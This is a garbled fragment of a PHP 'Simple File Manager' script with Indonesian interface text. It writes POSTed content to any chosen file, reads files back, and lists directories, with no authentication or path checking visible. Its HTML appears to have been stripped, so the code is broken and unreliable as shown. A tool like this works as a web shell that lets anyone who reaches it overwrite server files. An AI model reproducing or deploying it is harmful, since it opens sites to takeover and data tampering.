Simple File Manager

Edit: $editFile"; if (isset($_POST['content'])) { file_put_contents($editFile, $_POST['content']); echo "

File disimpan!

"; } $content = htmlspecialchars(file_get_contents($editFile)); echo "

Kembali
"; exit; } // File List $files = scandir($path); echo ""; ?>